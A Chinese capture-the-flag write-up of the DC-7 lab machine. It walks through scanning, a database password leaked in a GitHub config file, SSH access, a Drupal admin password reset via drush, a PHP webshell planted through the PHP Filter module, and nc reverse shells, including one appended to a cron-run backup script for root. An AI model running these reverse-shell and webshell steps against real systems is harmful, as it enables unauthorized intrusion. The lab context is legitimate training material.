DC-7靶机渗透测试

2023-11-13

DC-7靶机渗透测试

1. 信息收集

1.1 主机扫描

netdiscover -r 192.168.188.157 -i eth0

image-20230812141925433

1.2 端口扫描

nmap -sS -sV -A -p- 192.168.188.177

image-20230812142215971

发现DC-7开放了22端口和80端口。

Web页面访问

image-20230812142317460

Wappalyzer扫描

image-20230812142659582

Drupal:Drupal是使用PHP编写的流行的开源内容管理系统。

1.3 目录扫描

dirsearch -u 192.168.188.177 -e * -i 200

image-20230812143422212

发现登录页面/user/login,进入到该页面查看。

image-20230812143547269

在尝试发现这里无法使用暴力破解或者字典攻击等。

DC-7作者给出的提示

image-20230812142523994

在左下角发现了一个 @DC7USER 使用浏览器查看,发现是一个 GitHub项目。进到Dc7User的github里面,在一个**config.php**文件里出现用户名和密码信息。

image-20230812144252367

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

2. SSH远程登录

使用获取到了用户名密码进行ssh远程登录。

ssh dc7user@192.168.188.177

image-20230812144456832

登录成功,查看都有哪些文件。

image-20230812144728238

发现了两个文件**backupsmobx文件夹,查看backups**文件。

image-20230812144839636

发现了两个后缀名为**.gpg**的文件,百度搜索一下该后缀。

.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。

.gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。

使用 GPG 可以为文件、文本消息、电子邮件等创建加密和解密操作。通过使用公钥加密算法和对称密钥加密算法,GPG 可以将数据加密并保护其安全性,同时确保只有拥有相应私钥或密码的人才能解密和访问数据。

需要注意的是,.gpg 文件本身并不能直接打开或查看其内容,因为它们经过加密保护。要解密 .gpg 文件并访问其中的内容,需要使用相应的加密软件(如 GPG)和正确的私钥或密码来进行解密操作。

查看mbox文件,发现在/opt/scripts/ 有个可以执行的脚本文件 backups.sh

image-20230812145523144

进入到/opt/scripts目录下进行查看

cd /opt/scripts/ 	 # 进入目录

cat backups.sh		 # 查看文件

image-20230812145716691

提示说切换到/vat/www/html下,执行drush命令。

image-20230813152938566

Drush(全称:Drupal Shell)是一个用于管理和维护 Drupal 内容管理系统的命令行工具。它提供了一组用于执行常见 Drupal 管理任务的命令,并允许开发人员在命令行界面上快速自动化执行这些任务。用于管理和操作drupal站点,可以用来修改管理员密码。

查看drush的命令

image-20230812191944496

进入到指定目录下执行drush命令。

drush user-password admin --password="123456"  # 修改密码

drush user-password admin --password="123456" 是一个使用 Drush 命令行工具的命令,用于修改 Drupal 站点中管理员账户(admin)的密码。

具体解析该命令如下:

  1. drush:这是执行 Drush 命令的关键字。
  2. user-password:这是 Drush 命令的子命令,用于修改用户密码。
  3. admin:这是要修改密码的目标用户,这里是指管理员账户。
  4. --password="123456":这是一个选项,用于指定新密码。在等号后面指定新密码,这里的新密码是 “123456”。

image-20230812151401324

返回返回到web页面进行登录

image-20230812151515633

登录成功!

3. 漏洞发现

浏览页面中在Manage下的Content,然后点击Add content

image-20230812151843451

点击Article

image-20230812152057500

尝试添加php一句话木马,发现Drupal 8版本以后为了安全需要将php单独作为一个模块导入。需要去扩展里下载安装

image-20230812152535544

安装扩展,以URL的形式安装php8

image-20230812153139774

在输入框输入下载路径

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20230812153315518

安装成功, 选第二个即可。

image-20230812153530875

在Extend里的List里,往下滑动,找PHP有关的,勾选上PHP Filter往下滑点击install。

安装完成

image-20230812153832248

4. 漏洞利用

然后来到Content进行编辑,添加php木马代码,保存text format设置为PHP code最后点击save保存即可。

image-20230812154240970

image-20230812154629647

首页显示创建成功

image-20230812154717958

查看刚刚上传的一句话木马所在的位置

image-20230812155029202

http://192.168.188.177/node/4

使用中国蚁剑进行连接

image-20230812155110613

kali开启监听4444端口

nc -lvp 4444 

image-20230812155259332

通过蚁剑的虚拟终端进行反弹shell

nc -e /bin/bash 192.168.188.157 4444

image-20230812155533358

反弹成功后设置python交互

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230812155559539

查看权限,发现当前权限比较低,进行提权。

5. 提权

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell。

image-20230812160701061

kali监听9999端口

image-20230812161710850

要对之前的 backups.sh 脚本写入反弹命令。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.188.157 9999 >/tmp/f" >> backups.sh

这个命令会将一条具有恶意的 Shell 脚本追加到 backups.sh 文件中。

下面对该命令进行详细解析:

  1. echo "...":这是用于输出文本的命令。在双引号内部的内容将被输出。
  2. "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.188.157 9999 >/tmp/f":这是要输出的具体内容,即恶意的 Shell 脚本。
    • rm /tmp/f:删除名为 /tmp/f 的文件,如果该文件存在的话。
    • mkfifo /tmp/f:创建一个命名管道(FIFO),名为 /tmp/f
      • 命名管道(FIFO)是一种特殊类型的文件,用于实现进程间通信。它是一种单向通信机制,允许一个进程写入数据到管道,而另一个进程则可以从同一个管道读取相应数据。
      • 命名管道在创建时会在文件系统中产生一个文件节点,当进程打开该文件并进行读取/写入操作时,其行为类似于对普通文件的操作。但不同于普通文件,命名管道没有实际的文件内容,它只是作为进程之间的通信通道。
    • cat /tmp/f | /bin/sh -i 2>&1:将 /tmp/f 的内容通过管道传递给 /bin/sh这会执行一个交互式的 Shell
    • nc 192.168.188.157 9999 >/tmp/f:将 /bin/sh 的输入和输出通过网络连接到 IP 地址为 192.168.188.157、端口为 9999 的远程主机,并将输出重定向到 /tmp/f 文件中。
  3. >> backups.sh:将前面输出的内容追加到名为 backups.sh 的文件末尾。若该文件不存在,则会创建一个新文件。

查看命令是否写入

image-20230812162621630

写入命令后在这里等待的时间较长,因为这个脚本是一个定时执行的脚本。

然后就进到root家目录获取最终flag。

image-20230812163045819

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

DC-7靶机渗透测试 的相关文章

  • 网络基础面试题(二)

    11 什么是网桥 防火墙的端口防护是指什么 网桥是一种网络设备 用于连接两个或多个局域网 LAN 并转发数据包 它能够根据MAC地址来识别和转发数据 提高网络的传输效率和安全性 防火墙的端口防护是指对防火墙上的各个端口进行保护和限制 只允许
  • 【一份老网工珍藏多年的网络配置笔记,很重要!】

    01 交换机 路由器的几种配置模式及模式转换 1 用户模式 登录到交换机 路由器 时会自动进入用户模式 提示符为 switchname gt 在该模式下只能够查看相关信息 对 IOS的运行不产生任何影响 2 特权模式 用户模式下 键入 en
  • 6类典型场景的无线AP选型和部署方案

    你们好 我的网工朋友 前段时间刚给你们来了篇解决无线频繁断网的技术文 解决无线频繁断网 这个办法值得收藏 不少朋友私聊 说想再聊聊无线AP的选型和部署方案 这不就安排上了 无线网络覆盖项目中 无线AP的合理选型和部署非常重要 在设计施工中
  • SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195)

    0x01 产品简介 SpiderFlow是新一代爬虫平台 以图形化方式定义爬虫流程 以流程图的方式定义爬虫 不写代码即可完成爬虫 是一个高度灵活可配置的爬虫平台 0x02 漏洞概述 SpiderFlow爬虫平台src main java o
  • 基于成本和服务质量考虑的不确定性下,电动汽车充电网络基础设施需求预测和迭代优化的分层框架研究(Python代码实现)

    欢迎来到本博客 博主优势 博客内容尽量做到思维缜密 逻辑清晰 为了方便读者 座右铭 行百里者 半于九十 本文目录如下 目录 1 概述 2 运行结果 3 参考文献 4 Python代码 数据
  • 白帽子如何快速挖到人生的第一个漏洞 | 购物站点挖掘商城漏洞

    本文针对人群 很多朋友们接触安全都是通过书籍 网上流传的PDF 亦或是通过论坛里的文章 但可能经过了这样一段时间的学习 了解了一些常见漏洞的原理之后 对于漏洞挖掘还不是很清楚 甚至不明白如何下手 可能你通过 sql labs 初步掌握了sq
  • Android开发中常见安全问题和解决方案

    前言 开发APP时经常有问到 APP的安全怎么保障 应用程序被PJ了怎么办 手机被人捡去了怎么办 特别在号称 安全第一 风控牛逼 的银行系统内 移动产品安全性仍被持有怀疑态度 那我们来总结下APP安全的方向和具体知识 1 应用程序安全 2
  • Android SDK开发艺术探索(五)安全与校验

    一 前言 本篇是Android SDK开发艺术探索系列的第五篇文章 介绍了一些SDK开发中安全方面的知识 包括资源完整性 存储安全 权限校验 传输安全 代码混淆等知识 通过基础的安全配置为SDK保驾护航 探索SDK开发在安全方面的最佳实践
  • 如何使用Imagewheel搭建一个简单的的私人图床无公网ip也能访问

    文章目录 1 前言 2 Imagewheel网站搭建 2 1 Imagewheel下载和安装 2 2 Imagewheel网页测试 2 3 cpolar的安装和注册 3 本地网页发布 3 1 Cpolar临时数据隧道
  • 小白入门黑客之渗透测试(超详细)基本流程(内附工具)

    经常会收到小伙伴们这样的私信 为什么我总是挖不到漏洞呢 渗透到底是什么样的流程呢 所以全网最详细的渗透测试流程来了 渗透测试其实就是通过一些手段来找到网站 APP 网络服务 软件 服务器等网络设备和应用的漏洞 告诉管理员有哪些漏洞 怎么填补
  • HPE Aruba Networking:五大网络现代化策略助力实现校园数字化转型

    作者 Aruba中国区技术销售总监 俞世丹 全球数字化进程日益加深 科技已成为加速教育行业发展的重要驱动力 人工智能 大数据 云计算 物联网 虚拟现实等新兴技术的快速发展 正在深刻改变着教育的形态和模式 为了更好地满足学校师生个性化教育教学
  • 网络安全(黑客)自学启蒙

    一 什么是网络安全 网络安全是一种综合性的概念 涵盖了保护计算机系统 网络基础设施和数据免受未经授权的访问 攻击 损害或盗窃的一系列措施和技术 经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 作
  • 揭秘网络世界的幕后密码——Wireshark网络协议分析软件

    在我们日常生活中 计算机和互联网已经成为不可或缺的一部分 然而 很少有人真正了解网络背后复杂的工作原理和通信协议 幸运的是 有一款强大而实用的软件 Wireshark 可以帮助我们深入了解网络世界的幕后密码 Wireshark是一款免费的网
  • 数据加密保障数据安全

    一 目标 1 1 预研需求 数据加密是安全领域中常用的安全措施 它们的主要作用是保护数据的机密性和完整性 以防止未经授权的访问 窃取 篡改或泄漏敏感信息 数据传输加密 保护敏感数据在传输过程中的安全 当数据通过网络传输时 它们可能会经过多个
  • 短信系统搭建主要因素|网页短信平台开发源码

    短信系统搭建主要因素 网页短信平台开发源码 随着移动互联网的快速发展 短信系统已成为企业和个人进行信息传递的重要工具 建立一个高效可靠的短信系统对于企业来说非常重要 下面我们将介绍一些影响短信系统搭建的主要因素 1 平台选择 在搭建短信系统
  • 全网最全(黑客)网络安全自学路线!熬夜两周整理(巨详细)

    学网络安全有什么好处 1 可以学习计算机方面的知识 在正式学习网络安全之前是一定要学习计算机基础知识的 只要把网络安全认真的学透了 那么计算机基础知识是没有任何问题的 操作系统 网络架构 网站容器 数据库 前端后端等等 可以说不想成为计算机
  • 网络安全(黑客)自学启蒙

    一 什么是网络安全 网络安全是一种综合性的概念 涵盖了保护计算机系统 网络基础设施和数据免受未经授权的访问 攻击 损害或盗窃的一系列措施和技术 经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 作
  • 【安全】mybatis中#{}和${}导致sql注入问题及解决办法

    0 问题 使用mybatis的时候遇到了 和 可能导致sql注入的问题 1 预先了解 1 底层通过prepareStatement对当前传入的sql进行了预编译 一个 被解析为一个参数占位符 解析之后会将String类型的数据自动加上引号
  • 【安全】使用docker安装Nessus

    目录 一 准备docker环境服务器 略 二 安装 2 1 搜索镜像 2 2 拉取镜像 2 3 启动镜像 三 离线更新插件 3 1 获取challenge 3 2 官方注册获取激活码 3 3 使用challenge码和激活码获取插件下载地址
  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全

随机推荐

  • mysql数据库权限控制(权限级别 、用户管理)

    权限级别 Global level 系统级 所有库 所有表 的权限 Database level 某个数据库中的所有表 的权限 able level 库中的某个表 的权限 Column level 表中的某个字段 的权限 procs lev
  • Basic Level 1082 射击比赛 (20分)

    题目 本题目给出的射击比赛的规则非常简单 谁打的弹洞距离靶心最近 谁就是冠军 谁差得最远 谁就是菜鸟 本题给出一系列弹洞的平面坐标 x y 请你编写程序找出冠军和菜鸟 我们假设靶心在原点 0 0 输入格式 输入在第一行中给出一个正整数 N
  • ant-design中textArea组件获取光标位置,插入表情之后自动将光标移至文本的最后

    目前的需求是要设置一段文本 但是文本里可以插入微信表情 需要实现在插入表情之后光标位置自动移到当前文本的最后 效果图 实现代码 textArea组件
  • es查询列表如何去重?

    SearchSourceBuilder builder new SearchSourceBuilder builder collapse new CollapseBuilder name keyword 在Elasticsearch中 bu
  • python面试总结

    python面试题 python中is和 的区别 Python中对象包含的三个基本要素 分别是 id 身份标识 type 数据类型 和value 值 比较的是value值 is 比较的是id 简述read readline readline
  • 解决pip._vendor.urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool

    解决pip vendor urllib3 exceptions ReadTimeoutError HTTPSConnectionPool host files pythonhosted org port 443 Read timed out
  • 公众号(服务号)模板消息(个人通知)开发方案

    公众号消息通知 微信公众号开发文档 公众号是以微信用户的一个联系人形式存在的 消息会话是公众号与用户交互的基础 目前公众号内主要有这样几类消息服务的类型 分别用于不同的场景 1 群发消息 公众号可以以一定频次 订阅号为每天1次 服务号为每月
  • windows下启动mysql服务的命令行启动和手动启动方法

    今天遇到mysql服务无法启动 上网一查很多人也遇到mysql服务器启动不了的问题 所以就索性整理了windows下启动mysql服务的命令行启动和手动启动方法的文章 以便各位遇到同类问题的朋友进行参考 1 图形界面下启动mysql服务 在
  • Hugging Face开源库accelerate详解

    官网 https huggingface co docs accelerate package reference accelerator Accelerate使用步骤 初始化accelerate对象accelerator Accelera
  • java基础案例教程黑马程序员案例答案,真香

    掌握核心知识 1 90 几率面试被问 吃透原理 面试不慌 Spring原理 2 大厂必问Redis 赶紧码起来 Redis核心原理 3 MySQL从入门到实战都在这篇 面试笑谈优化 当然核心知识不止这三点 这只是一部分 吃透源码 1 面试源
  • 默认路由(详细解析)

    一 默认路由 1 全球最大的网段 子网掩码越短 子网掩码写成二进制形式后1的个数越少 主机位越多 该网段的地址数量就越大 因此如果想让一个网段包括全部的IP地址 就要求子网掩码短到极限 最短就是0 子网掩码变成了0 0 0 0 这也意味着该
  • Scrapy框架之Crawlspider的使用

    Scrapy存在多种爬虫类 最常用的有两种 第一种是基于basic模版创建的普通爬虫类Scrapy spider 另一种是基于crawl的规则性爬虫类scrapy spider crawlspider 一 crawlspider 经常用于数
  • 记一次应用破解——脱壳修改后重打包

    样本是在某个群里下载的 当时是有人发出来找人帮忙修改下 我是想练练手就下载下来开始修改 首先拿到应用先看了下是加壳了 腾讯的壳 然后安装看了下需要修改的地方 需求就是改一下qq群 开始动手 一 脱壳拿到dex文件 我这里直接使用脱壳机脱壳拿
  • 称重传感器HX711的驱动。适用于arduino、ESP32

    github链接 YukiTbst trust measurer 基于HX711的旋翼推力测量实验台 包含了HX711的驱动 Propeller trust measurer based on HX711 including a drive
  • Ubuntu下ftp服务器配置方法 (高级配置)

    Ubuntu下ftp服务器配置方法 Ubuntu自 带的FTP服务器是vsftpd 1 安装vsftpd Ubuntu安装软件倒不是件困难的事 输入 sudo apt get install vsftpd 安装了之后会在 home 下建立一
  • 《啥是佩奇》,python程序员眼中的佩琦

    啥是佩奇 从前天晚上开始 朋友圈就被这条广告刷屏 也许很多人 看完这个短片也有这样的想法 没错 佩奇是容易被忽略的亲情 明明是一个广告 都能这么吸引人 让人笑中带泪 泪中含笑的 告诉爷爷 你需要什么东西 爷爷给你准备 佩奇 什么是佩奇呀 这
  • Neo4j:入门基础(二)之导入CSV文件

    CSV文件 1 csv文件推荐是utf 8编码 否则会造成中文乱码 2 csv文件默认需要放在import目录下 如需从远程或者其他本地目录导入 则需要修改conf neo4j conf load csv时文件路径 默认需要放在 NEO4J
  • Cesium 之加载ArcGIS Server 4490切片服务(含orgin -400 400)

    对于ArcGIS Server发布的切片服务 在地理坐标系中Cesium默认只支持wgs84的4326坐标系 无法通过ArcGisMapServerImageryProvider直接加载CGCS2000的4490坐标系 虽然可以使用WebM
  • openGL之API学习(六十七)glTexParameter glTextureParameter

    设置纹理对象的参数 这两个函数其实是一个功能 void glTexParameterf GLenum target GLenum pname GLfloat param target Specifies the target to whic
  • DC-7靶机渗透测试

    文章目录 DC 7靶机渗透测试 1 信息收集 1 1 主机扫描 1 2 端口扫描 1 3 目录扫描 2 SSH远程登录 3 漏洞发现 4 漏洞利用 5 提权 DC 7靶机渗透测试 1 信息收集 1 1 主机扫描 netdiscover r